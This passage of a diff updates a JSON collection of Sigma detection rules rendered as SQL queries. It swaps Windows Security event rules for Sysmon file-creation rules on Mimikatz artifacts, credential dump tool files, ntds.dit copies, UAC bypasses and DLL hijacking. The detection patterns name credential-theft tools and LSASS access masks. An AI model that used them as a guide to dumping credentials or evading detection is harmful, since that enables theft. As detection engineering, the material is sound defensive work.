ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + "filename": "file_event_win_uac_bypass_wmp.yml" }, { - "title": "PetitPotam Suspicious Kerberos TGT Request", - "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "title": "Office Template Creation", + "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", "status": "experimental", - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step 
would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "author": "Mauricio Velazco, Michael Haag", + "description": "Detects creation of template files for Microsoft Office from outside Office", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR Image 
LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" ], - "filename": "win_security_petitpotam_susp_tgt_request.yml" + "filename": "file_event_win_word_template_creation.yml" }, { - "title": "Defrag Deactivation - Security", - "id": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", + "title": "Mimikatz Kirbi File Creation", + "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", "status": "test", - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", + "author": "Florian Roth (Nextron Systems), David ANDRE", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.s0111" + "attack.credential_access", + "attack.t1558" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4701' AND TaskName LIKE '\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\'))" ], - "filename": "win_security_apt_slingshot.yml" + "filename": "file_event_win_hktl_mimikatz_files.yml" }, { - "title": "Important Scheduled Task Deleted/Disabled", - "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "title": "Legitimate Application Dropped Executable", + "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects programs on a Windows system that should not write executables to disk", + 
"author": "frack113, Florian Roth", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR 
TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" + "filename": "file_event_win_legitimate_app_dropping_exe.yml" }, { - "title": "Remote PowerShell Sessions Network Connections (WinRM)", - "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "title": "UAC Bypass Abusing Winsat Path Parsing - File", + "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", "status": "test", - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of remote PowerShell execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" ], - "filename": "win_security_remote_powershell_session.yml" + "filename": "file_event_win_uac_bypass_winsat.yml" }, { - "title": "Pass the Hash Activity 2", - "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", - "status": "stable", - "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", - "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", + "title": "Cred Dump Tools Dropped Files", + "id": 
"8fbf3271-1ef6-4e94-8210-03c2317947f6", + "status": "test", + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1550.002" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Administrator activity" + "Legitimate Administrator using tool for password recovery" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4624' AND SubjectUserSid = 'S-1-0-0' AND LogonType = '3' AND LogonProcessName = 'NtLmSsp' AND KeyLength = '0') OR (EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo')) AND NOT (TargetUserName = 'ANONYMOUS LOGON'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\')))" ], - "filename": "win_security_pass_the_hash_2.yml" + "filename": "file_event_win_cred_dump_tools_dropped_files.yml" }, { - "title": "Azure AD Health Service Agents Registry Keys Access", - "id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "title": "Creation Exe for Service with Unquoted Path", + "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", "status": "test", - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. 
Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\ADHealthAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\')" ], - "filename": "win_security_aadhealth_svc_agent_regkey_access.yml" + "filename": "file_event_win_creation_unquoted_service_path.yml" }, { - "title": "Access Token Abuse", - "id": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", + "title": "Suspicious Process Writes Ntds.dit", + "id": 
"11b1ed55-154d-4e82-8ad7-83739298f720", "status": "experimental", - "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", - "author": "Michaela Adams, Zach Mathis", + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1134.001" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Anti-Virus" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'Advapi' AND AuthenticationPackageName = 'Negotiate' AND ImpersonationLevel LIKE '\\%\\%1833' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "win_security_access_token_abuse.yml" + "filename": "file_event_win_susp_ntds_dit.yml" }, { - "title": "Generic Password Dumper Activity on LSASS", - "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "title": "Suspicious Get-Variable.exe Creation", + "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "status": "experimental", - "description": "Detects process handle on LSASS process with certain access mask", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "description": "Get-Variable is a valid 
PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "car.2019-04-004", - "attack.t1003.001" + "attack.persistence", + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE 
'%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 
'%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_lsass_dump_generic.yml" + "filename": "file_event_win_susp_get_variable.yml" }, { - "title": "Addition of Domain Trusts", - "id": "0255a820-e564-4e40-af2b-6ac61160335c", - "status": "stable", - "description": "Addition of domains is seldom and should be verified for legitimacy.", - "author": "Thomas Patzke", + "title": "Creation Of Non-Existent System DLL", + "id": "df6ecb8b-7822-4f4b-b412-08f524b4576c", + "status": "experimental", + "description": "Detects the creation of system dlls that are not present on the system. Usually to achieve dll hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems), fornotes", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1098" + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate extension of domain structure" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4706')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') OR TargetFilename LIKE '%\\\\SprintCSP.dll' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_susp_add_domain_trust.yml" + "filename": "file_event_win_create_non_existent_dlls.yml" }, { - "title": "Credential Dumping Tools Service Execution - Security", - "id": 
"f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "DLL Search Order Hijackig Via Additional Space in Path", + "id": "b6f91281-20aa-446a-b986-38a92813a18f", + "status": "experimental", + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_mal_creddumper.yml" + "filename": 
"file_event_win_dll_sideloading_space_path.yml" }, { - "title": "Tap Driver Installation - Security", - "id": "9c8afa4d-0022-48f0-9456-3712466f9701", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Potential Persistence Attempt Via ErrorHandler.Cmd", + "id": "15904280-565c-4b73-9303-3291f964e7f9", + "status": "experimental", + "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.persistence" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%tap0901%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\WINDOWS\\\\Setup\\\\Scripts\\\\ErrorHandler.cmd' ESCAPE '\\')" ], - "filename": "win_security_tap_driver_installation.yml" + "filename": "file_event_win_persistence_error_handler_cmd.yml" }, { - "title": "Win Susp Computer Name Containing Samtheadmin", - "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "title": "VsCode Powershell Profile Modification", + "id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", "status": "experimental", - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "author": "elhoim", + "description": "Detects the creation or modification of a vscode related powershell profile which could indicate 
suspicious activity as the profile can be used as a mean of persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "cve.2021.42278", - "cve.2021.42287", "attack.persistence", "attack.privilege_escalation", - "attack.t1078" + "attack.t1546.013" ], "falsepositives": [ - "Unknown" + "Legitimate use of the profile by developers or administrators" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft.VSCode\\_profile.ps1' ESCAPE '\\')" ], - "filename": "win_security_susp_computer_name.yml" + "filename": "file_event_win_susp_vscode_powershell_profile.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "status": "test", + "description": "Detects file writes of WMI script event consumer", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' 
